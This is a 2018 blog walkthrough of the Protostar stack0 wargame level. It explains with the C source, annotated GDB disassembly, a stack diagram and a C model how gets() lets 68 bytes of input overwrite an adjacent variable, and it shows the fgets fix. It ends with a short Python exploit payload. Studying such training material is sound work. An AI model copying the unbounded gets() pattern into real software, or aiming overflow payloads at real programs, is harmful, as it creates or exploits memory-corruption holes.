Binary Exploitation Protostar Stack0 - Walkthrough

Posted by Suraj Singh on April 04, 2018 · 6 mins read
Hello guys,

In this post I am going to show how to beat the Protostar stack0 level. The main goal here is not just to print the win message, but to understand how the program actually works at the machine level: where the variables sit on the stack, why gets() can reach past the buffer, and how to compute the exact payload from the disassembly.

Before starting this walkthrough, I want to highlight a few points.

  • I am not the creator of the Protostar war game, I am just a player.
  • Here I only provide hints and references, so if you get stuck anywhere, take a look here.
  • For a practical hint, check the YouTube video given below.


Source Code :



    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    int main(int argc, char **argv)
    {
        volatile int modified;   /* the target: sits just above buffer on the stack */
        char buffer[64];         /* 64-byte buffer, filled by gets() */

        modified = 0;
        gets(buffer);            /* no length check: input longer than 64 bytes overflows into modified */

        if(modified != 0) {
            printf("you have changed the 'modified' variable\n");
        } else {
            printf("Try again?\n");
        }
    }


Disassembly Of Main Function (Using GDB)


########################################################################################################
[ sub esp,0x60 reserves 0x60 = 96 bytes (not bits) of stack space for main's locals and the gets() argument ]
########################################################################################################

[-------------------------------------code-------------------------------------]
0x80483f5 <main+1>: mov ebp,esp <<=== Set up the new frame pointer (the old ebp was pushed at main+0)
0x80483f7 <main+3>: and esp,0xfffffff0 <<=== Align the stack pointer to 16 bytes
0x80483fa <main+6>: sub esp,0x60 <<=== Reserve 0x60 = 96 bytes on the stack
=> 0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0 <<=== modified = 0; it lives at esp+0x5c, i.e. bytes 92..95 of the frame
0x8048405 <main+17>: lea eax,[esp+0x1c] <<=== Load the address of buffer (esp+0x1c, byte offset 28) into EAX;
                                              buffer[64] occupies bytes 28..91, directly below modified
0x8048409 <main+21>: mov DWORD PTR [esp],eax <<=== Store that address at [esp] as the argument for gets()
0x804840c <main+24>: call 0x804830c <gets@plt> <<=== gets(buffer): no length check, so input beyond 64 bytes runs into modified
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c] <<=== Reload modified into EAX for the comparison


Situation On Stack (byte offsets from esp after sub esp,0x60)



0                        28                                                      92        96
============================================================================================
 [esp] gets() arg + pad | buffer[64]                                            | modified |
============================================================================================
                         ^                                                      ^
                         |                                                      |
                         gets() starts writing here                             target area: input bytes 64..67 land here
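To check the offset arithmetic without the Protostar VM, here is an added C model of main's frame. It is my own example, not code from Protostar or from the original post: it lays out a 96-byte frame with buffer at offset 0x1c and modified at 0x5c, feeds it the same 'a'*64 + 'b'*4 style payload through a gets()-like copy with no length check, and then through an fgets(buffer, sizeof buffer)-like copy to show the fix. The names unsafe_gets, safe_fgets, run_stack0, build_payload and modified_after_input are mine; the payload bytes are constructed inline.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout taken from the disassembly above (offsets from esp after
 * sub esp,0x60). Everything else in this file is an added model, not
 * code from Protostar or from the original post. */
#define FRAME_SIZE   0x60   /* sub esp,0x60 reserves 96 bytes             */
#define BUFFER_OFF   0x1c   /* lea eax,[esp+0x1c] -> buffer starts at 28   */
#define BUFFER_LEN   64     /* char buffer[64] -> bytes 28..91             */
#define MODIFIED_OFF 0x5c   /* mov DWORD PTR [esp+0x5c],0 -> bytes 92..95  */

typedef void (*reader_fn)(uint8_t *frame, const uint8_t *in, size_t len);

/* Models gets(): copies the whole input into buffer with no length check.
 * The only clamp keeps the copy inside the 96-byte frame so the model
 * itself stays defined; the real gets() has no such limit and would keep
 * writing past modified into whatever lies above it. */
static void unsafe_gets(uint8_t *frame, const uint8_t *in, size_t len)
{
    size_t room = FRAME_SIZE - BUFFER_OFF;          /* 68 bytes to frame end */
    memcpy(frame + BUFFER_OFF, in, len < room ? len : room);
}

/* Models fgets(buffer, sizeof buffer, stdin): at most 63 bytes plus a NUL,
 * so the write can never reach modified. */
static void safe_fgets(uint8_t *frame, const uint8_t *in, size_t len)
{
    size_t n = len < BUFFER_LEN - 1 ? len : BUFFER_LEN - 1;
    memcpy(frame + BUFFER_OFF, in, n);
    frame[BUFFER_OFF + n] = '\0';
}

/* Run one "main": zero the frame (modified = 0), read input, return modified. */
static uint32_t run_stack0(reader_fn reader, const uint8_t *in, size_t len)
{
    uint8_t frame[FRAME_SIZE];
    uint32_t modified;

    memset(frame, 0, sizeof frame);                 /* modified = 0 */
    reader(frame, in, len);
    memcpy(&modified, frame + MODIFIED_OFF, sizeof modified);
    return modified;
}

/* Same shape as the Python payload: 'a' for the first 64 bytes, 'b' after.
 * 68 bytes in total reaches all four bytes of modified. */
static size_t build_payload(uint8_t *out, size_t cap, size_t len)
{
    if (len > cap)
        len = cap;
    for (size_t i = 0; i < len; i++)
        out[i] = (i < BUFFER_LEN) ? 'a' : 'b';
    return len;
}

/* Value of modified after feeding input_len payload bytes to the chosen reader. */
static uint32_t modified_after_input(size_t input_len, int use_fgets)
{
    uint8_t payload[FRAME_SIZE];                    /* constructed sample input */
    size_t len = build_payload(payload, sizeof payload, input_len);
    return run_stack0(use_fgets ? safe_fgets : unsafe_gets, payload, len);
}

int main(void)
{
    printf("gets,  64 bytes: modified = 0x%08x\n", (unsigned)modified_after_input(64, 0));
    printf("gets,  68 bytes: modified = 0x%08x\n", (unsigned)modified_after_input(68, 0));
    printf("fgets, 68 bytes: modified = 0x%08x\n", (unsigned)modified_after_input(68, 1));
    return 0;
}
```

With exactly 64 bytes modified stays 0, with 65 or more the first extra byte lands in it, and with 68 bytes it reads 0x62626262 ('bbbb'). The fgets variant leaves modified untouched however long the input is. Note the clamp in unsafe_gets exists only to keep the model well defined; in the real binary an even longer input runs on past modified into the saved frame pointer and return address, which is what the later Protostar stack levels build on.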


Exploit


#!/usr/bin/env python3

# Frame size: 0x60 = 96 bytes
# 0x80483fa <main+6>:  sub esp,0x60                 ==> 96 bytes of stack space
# 0x8048405 <main+17>: lea eax,[esp+0x1c]           ==> buffer starts at esp+0x1c (offset 28)
# 0x80483fd <main+9>:  mov DWORD PTR [esp+0x5c],0x0 ==> modified lives at esp+0x5c (offset 92)
# 0x804840c <main+24>: call 0x804830c <gets@plt>    ==> gets() has no bounds check
# 92 - 28 = 64 bytes of buffer, then the 4 bytes of modified

import sys

payload = b'a' * 64    # fills buffer[64] exactly
payload += b'b' * 4    # overwrites modified with 0x62626262 (any non-zero value wins)

# usage: python3 exploit.py > tmp && ./bin/stack0 < tmp
sys.stdout.buffer.write(payload + b'\n')



For a more detailed walkthrough, check the YouTube video playlist provided below.